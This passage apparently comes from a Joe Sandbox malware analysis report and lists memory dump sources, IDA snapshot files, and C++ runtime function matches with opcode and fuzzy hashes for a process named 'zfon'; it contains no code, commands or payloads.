                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear
                                                                                                • String ID:
                                                                                                • API String ID: 2864223729-0
                                                                                                • Opcode ID: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                • Instruction ID: 5cf5bf708bc17c66b19be321a88a27ddae350fd7e883f3471fbbe9fcdef8d512
                                                                                                • Opcode Fuzzy Hash: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                • Instruction Fuzzy Hash: 2EF01412A1858991EB90FF64CC521FE5A31AB58744FC41E31E62D450EB9F18D55683B1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$NameName::
                                                                                                • String ID:
                                                                                                • API String ID: 168861036-0
                                                                                                • Opcode ID: d02a360015473b4719725f8be3ceded12c4e7da7de9f02c09df3532ae03b7663
                                                                                                • Instruction ID: f6dd4be62f39c3a1583c2b9411cd20e42f2523c748043de63e93b4d75c2d2b09
                                                                                                • Opcode Fuzzy Hash: d02a360015473b4719725f8be3ceded12c4e7da7de9f02c09df3532ae03b7663
                                                                                                • Instruction Fuzzy Hash: DD81C434924E0A8FEB55DF58D898BAA77F2FB95300F20415AD00AD7295DB749C89CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 35ae5500d617e4e34fe7a48e5de47b389157bb8d741169297bf601fcce6233db
                                                                                                • Instruction ID: d7512ad6e4cfb92b4c954559b149e647b76f8e52ff89df72b471b998727d9139
                                                                                                • Opcode Fuzzy Hash: 35ae5500d617e4e34fe7a48e5de47b389157bb8d741169297bf601fcce6233db
                                                                                                • Instruction Fuzzy Hash: 82519534118E1D8FEB54EF5CC499B66B7E1FBA9310F50055EE14AC31A2DA70EC44CB82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 61e06795d542277064a9063eb9b9662c84188e01c661d0321e092b5a3e40d221
                                                                                                • Instruction ID: e0903de266ff9e7943753a51f4d91ae4171df12f8a815f0f9854793b309acc8f
                                                                                                • Opcode Fuzzy Hash: 61e06795d542277064a9063eb9b9662c84188e01c661d0321e092b5a3e40d221
                                                                                                • Instruction Fuzzy Hash: 2A51A434614A0E8FE798EF58D4A87A773D2FBD9310F60056BE409C3192DA70EC45CB82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: d83bd2ec66cc20632ef20e6c13a125de58649c408e943948c276adf13a798222
                                                                                                • Instruction ID: 2314b67beaa4439e49aa24bdccc93977df6b27038babec824f46ec7f80c98195
                                                                                                • Opcode Fuzzy Hash: d83bd2ec66cc20632ef20e6c13a125de58649c408e943948c276adf13a798222
                                                                                                • Instruction Fuzzy Hash: 15419135114D0A8FEB99EF5CD4A87AB73E2FBA9310F60055AE40AC3197DA70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 1001463fed7176c6a56c2cc361bdc8a5f2760466829b86a5aa937572d60040f5
                                                                                                • Instruction ID: 7ea05369f60602f67c8acc49c3331ae925093ab2e859334bac4df78ac64e23ec
                                                                                                • Opcode Fuzzy Hash: 1001463fed7176c6a56c2cc361bdc8a5f2760466829b86a5aa937572d60040f5
                                                                                                • Instruction Fuzzy Hash: C2416535118E098FE784EF58D4A9B6777E1FBA8310F20056FE05AD32A2DA30DD46CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 9d8fa5dccc2c7df26ba784e87d8baca838a30e895e23befe89f00c96d4a17384
                                                                                                • Instruction ID: 55b3d2e9e263d76662ea0c862dce7a5fbcbf106b5903ed7423b66018b15c311e
                                                                                                • Opcode Fuzzy Hash: 9d8fa5dccc2c7df26ba784e87d8baca838a30e895e23befe89f00c96d4a17384
                                                                                                • Instruction Fuzzy Hash: AD419A35118E0A8FEB94EF58D69976773E2FBA8310F20065ED559C3163DA30DC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2656477967-0
                                                                                                • Opcode ID: aabf4c4db5fb73a72882f7e28f833ad5c50c59743f7b5512740becf53d4abf52
                                                                                                • Instruction ID: f95cffa2f94c789f41ef4a1540ef75140a4b4cdef1ab63d3a655af1f475f82e2
                                                                                                • Opcode Fuzzy Hash: aabf4c4db5fb73a72882f7e28f833ad5c50c59743f7b5512740becf53d4abf52
                                                                                                • Instruction Fuzzy Hash: E1418335118E0A8FEB84EF58D4A97A777E2FBA8354F20066EE059C31A2CA30DD41C743
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeRegister
                                                                                                • String ID:
                                                                                                • API String ID: 3084244483-0
                                                                                                • Opcode ID: 382b27cc47d4d4d2e3d12a9d844b30cb403f7a8cf6ab082c956de496a2ecd116
                                                                                                • Instruction ID: ca192b5a57e53fffa405bbcd558e16d5684b16de3c8da8042605d77784606f92
                                                                                                • Opcode Fuzzy Hash: 382b27cc47d4d4d2e3d12a9d844b30cb403f7a8cf6ab082c956de496a2ecd116
                                                                                                • Instruction Fuzzy Hash: B4412135118E0ACFEB94EF58D499B67B7E2FBA8314F24055AD05AC31A2DA30DD45CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 36a46e987eec6efcde8bae8a05a4e734d5a5e009e9c00953979c006a253adb4b
                                                                                                • Instruction ID: 2a2c1430d039b266162ea6ad751fdec0c743c2a02093d896d551cb4fb18a3fac
                                                                                                • Opcode Fuzzy Hash: 36a46e987eec6efcde8bae8a05a4e734d5a5e009e9c00953979c006a253adb4b
                                                                                                • Instruction Fuzzy Hash: C731B635108E0E8FEB59EF6CD4A8B6677D2FBA5310F61045AE04AC3192DA74EC41C752
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: c8df43411027ee0eacf25160c64c1c6837d1a75b5692cc2013478a6db91940d2
                                                                                                • Instruction ID: e8cb9c42f6253cd670aa8bf338d20c4288a5dfa1103759b0fddda308c30e99d4
                                                                                                • Opcode Fuzzy Hash: c8df43411027ee0eacf25160c64c1c6837d1a75b5692cc2013478a6db91940d2
                                                                                                • Instruction Fuzzy Hash: 2B318635618A1D8FE759EF58D8A876773D2FBA9310F20056BD04AC3296DA74EC05C783
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 1a93674ec69a5735ffc695062ee79727fc64cbeb286943dc879ab4140d30de10
                                                                                                • Instruction ID: 9cd53af7ab92f25c0d119a91f0d2dee9f9e98093d101ae3df025a4da3d793bad
                                                                                                • Opcode Fuzzy Hash: 1a93674ec69a5735ffc695062ee79727fc64cbeb286943dc879ab4140d30de10
                                                                                                • Instruction Fuzzy Hash: FB31A774208E0E8FF758EB5CD8A8B6773E2F7A5310F60051AE01AC3192DA70EC01C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: c7ba1efc560f9f7a799841fb3f637d69f22de253fd67b94bfea447ecd5ef99a2
                                                                                                • Instruction ID: a2a1f26e3953cfdbbc5c1a7265948dd7cca0581d1d3b9f6c9ca4f027be98794f
                                                                                                • Opcode Fuzzy Hash: c7ba1efc560f9f7a799841fb3f637d69f22de253fd67b94bfea447ecd5ef99a2
                                                                                                • Instruction Fuzzy Hash: 70318534114E1E8FEB55EB9CD8A8BA773E2FBA5310F61056AD01AC3192DA70EC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 01aba30f30b8db2cc18e541b81b84b10a987afc259ab90795f57b8b72824d431
                                                                                                • Instruction ID: 99d202c2e54d22ca6eff98f22ba839d5ca850ffc2fc8dc4a66497916caa2bb50
                                                                                                • Opcode Fuzzy Hash: 01aba30f30b8db2cc18e541b81b84b10a987afc259ab90795f57b8b72824d431
                                                                                                • Instruction Fuzzy Hash: DB318535118E0E8FEB55EB98D4A876A73D2FBA9310F60056BE45AC7196DA70EC01C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: b1aa785ebf1be1dd13bba7e54e87b7b3feaa6856ec30afba21a04f671a13dfa8
                                                                                                • Instruction ID: 08b6bf01468d0b7823d43da284a62af5aaa89e347b5d75c5aab1b191e28665c5
                                                                                                • Opcode Fuzzy Hash: b1aa785ebf1be1dd13bba7e54e87b7b3feaa6856ec30afba21a04f671a13dfa8
                                                                                                • Instruction Fuzzy Hash: 9A315234218E0E8FE755EB5CD8A8B6B73D2FBA9310F61055AD40AC3292CA71EC06C752
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 5e9559544ae838697aff2003c89a20d3b26c38e6557d22376aca609cf3fce5c7
                                                                                                • Instruction ID: 8721b1090adf76f1f0ff08b4b7664cf2e41f13b19d905a23b09bfe8c3c679c63
                                                                                                • Opcode Fuzzy Hash: 5e9559544ae838697aff2003c89a20d3b26c38e6557d22376aca609cf3fce5c7
                                                                                                • Instruction Fuzzy Hash: D3317234618A0D8FE795EF58D8A876773D2FBE9310F60056BE04AC3196DA70EC05C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 5db84670c3be3fb5094032f7cc3172bc4b7ba1af00b02190cd9d95f796dbd767
                                                                                                • Instruction ID: 4812570b70db5fed39cccdf1b56cfb08bd3b37aca005660bfe8209ca7d5e78e2
                                                                                                • Opcode Fuzzy Hash: 5db84670c3be3fb5094032f7cc3172bc4b7ba1af00b02190cd9d95f796dbd767
                                                                                                • Instruction Fuzzy Hash: 0C319335204E0E8FFB54EB5CD8A8B67B7E2FBA9310F60051AD00AC3192DA70EC02C752
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: c6f73dd326dc1c081d63b1c68f07dc92fbedf7debfbab933f23a8b943fe6931e
                                                                                                • Instruction ID: 2e64eef39c85316d898fb77216767137151ac90fd23284bc951410e13f014b85
                                                                                                • Opcode Fuzzy Hash: c6f73dd326dc1c081d63b1c68f07dc92fbedf7debfbab933f23a8b943fe6931e
                                                                                                • Instruction Fuzzy Hash: 65317235214E0E8FEB55EF58D8A8B6773D2FBA9310F60056BE40AC7192DA70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 50e2e1a74a0cf5e6311173a02a8286c3d737a3608833a0796616b14560155919
                                                                                                • Instruction ID: c01e20b047121d32d8f1a8e4bd032b77bf48f182692be2923d15ca5fe40fc75d
                                                                                                • Opcode Fuzzy Hash: 50e2e1a74a0cf5e6311173a02a8286c3d737a3608833a0796616b14560155919
                                                                                                • Instruction Fuzzy Hash: 20318734118A5E8FE795EF98D5A87A673E2FBA5360F20055ED10AC3196DA70EC05C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 661136fd98006e19691f6f5f900acc5de80e147c60418febdf896cbc6aeb5b24
                                                                                                • Instruction ID: db33dea423ac2d3931d2c9edc5e7c03c273d7939a3c3dd0316dd95819cd9839d
                                                                                                • Opcode Fuzzy Hash: 661136fd98006e19691f6f5f900acc5de80e147c60418febdf896cbc6aeb5b24
                                                                                                • Instruction Fuzzy Hash: 19315235114E1A8FE755EB5CD4A876B73E2FBA9320F60056AE05AC3192DB70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 83453f4eb3bf1dffc0219fa45b3e84c53879ec1447a878ff3e7c635ee0b3b3df
                                                                                                • Instruction ID: 97623dad366547572b7c128f6e599918962329b2d75dbec8594bd43be6fe1c95
                                                                                                • Opcode Fuzzy Hash: 83453f4eb3bf1dffc0219fa45b3e84c53879ec1447a878ff3e7c635ee0b3b3df
                                                                                                • Instruction Fuzzy Hash: 7D316534114E0E8FEB55EF5CD4A8B6777D2FBA5310F61055AE05AC7192DA70EC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: dbf76419f223492eb4d567d1ddfead33f015857671d4f618bff8f034f41251d9
                                                                                                • Instruction ID: 57c8a16a8753041b4af4e481d9e9e84e139536c4dba7860a0ccef6dad3e40696
                                                                                                • Opcode Fuzzy Hash: dbf76419f223492eb4d567d1ddfead33f015857671d4f618bff8f034f41251d9
                                                                                                • Instruction Fuzzy Hash: 5F318135614E0E8FE795EB58D4ACB6773D2FBA9310F21056BE50AC71A2DA70EC01C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: fc80a38f84d8b1e51c9f1ab55edaf59f604e24cdd39e5698dc947f378b48ed39
                                                                                                • Instruction ID: eccec134b01c5a60afad83a93df72a4b9e58b6e435cfc80e3596912e16f4b96a
                                                                                                • Opcode Fuzzy Hash: fc80a38f84d8b1e51c9f1ab55edaf59f604e24cdd39e5698dc947f378b48ed39
                                                                                                • Instruction Fuzzy Hash: 8F319339118E1E8FEB54EF5CD4A8B6673D2FBA9310F60055AE00AC31A2DA74EC02C746
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 724891deb70f6bab97fdbecb20f7882af71e6b5afc024078879898faf6915d7b
                                                                                                • Instruction ID: 06bbcdd7d05e757c2c2664d7564a3a44a7a99e06e62acb77f0175fa2a31d5b9e
                                                                                                • Opcode Fuzzy Hash: 724891deb70f6bab97fdbecb20f7882af71e6b5afc024078879898faf6915d7b
                                                                                                • Instruction Fuzzy Hash: 0031B235608E0E8FEF59EF58D4A87A673D2FBA9310F60051BE41AC3192DA74EC05C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 3501a55cac674ec943a4107704978858b696d4dcc1e684f7dc7953510d33aca6
                                                                                                • Instruction ID: 322e054f45ab4e982d6ff274070ff84d276622ea71eedcbde6d0d73bdacb0c27
                                                                                                • Opcode Fuzzy Hash: 3501a55cac674ec943a4107704978858b696d4dcc1e684f7dc7953510d33aca6
                                                                                                • Instruction Fuzzy Hash: F2319434218E1E8FE755EF9CD4A9B6773E2FBA9310F60055AE44AC3196DA70EC05C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: "$/
                                                                                                • API String ID: 946306463-2662438755
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: ($/
                                                                                                • API String ID: 946306463-2468745909
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 1346393832-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_task$Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 2973761340-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocwcsstd::_$Yarn
                                                                                                • String ID:
                                                                                                • API String ID: 1194159078-0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: &$/
                                                                                                • API String ID: 1109970293-2578988991
                                                                                                APIs
                                                                                                Memory Dump Source
